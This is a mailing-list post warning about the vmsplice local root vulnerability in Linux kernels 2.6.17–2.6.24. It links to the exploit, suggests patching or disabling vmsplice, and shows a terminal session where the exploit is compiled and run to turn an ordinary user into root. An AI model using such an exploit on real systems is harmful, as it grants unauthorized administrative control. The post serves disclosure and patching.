sup guys, i thought i should share this 2 days ago a vulnerability was reported in kernel 2.6.17 - 2.6.24, a local root exploit can be found on https://bugs.gentoo.org/attachment.cgi?id=143059 for more information on https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587
to fix this u can recompile the kernel without vmsplice, other patches r available i tested it on gutsy x86_64 and it worked.. [EMAIL PROTECTED]:/tmp$ gcc linux_vmsplice.c -o exploit [EMAIL PROTECTED]:/tmp$ whoami ag [EMAIL PROTECTED]:/tmp$ ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x100000000000 .. 0x100000001000 [+] page: 0x100000000000 [+] page: 0x100000000038 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4038 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0x2b66fdb34000 .. 0x2b66fdb66000 [+] root [EMAIL PROTECTED]:/tmp# whoami root [EMAIL PROTECTED]:/tmp# cheers.. -- \x41\x61\x67 --~--~---------~--~----~------------~-------~--~----~ You received this message because you are subscribed to the Google Groups "Jolug" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/Jolug?hl=en-GB -~----------~----~----~----~------~----~------~--~---
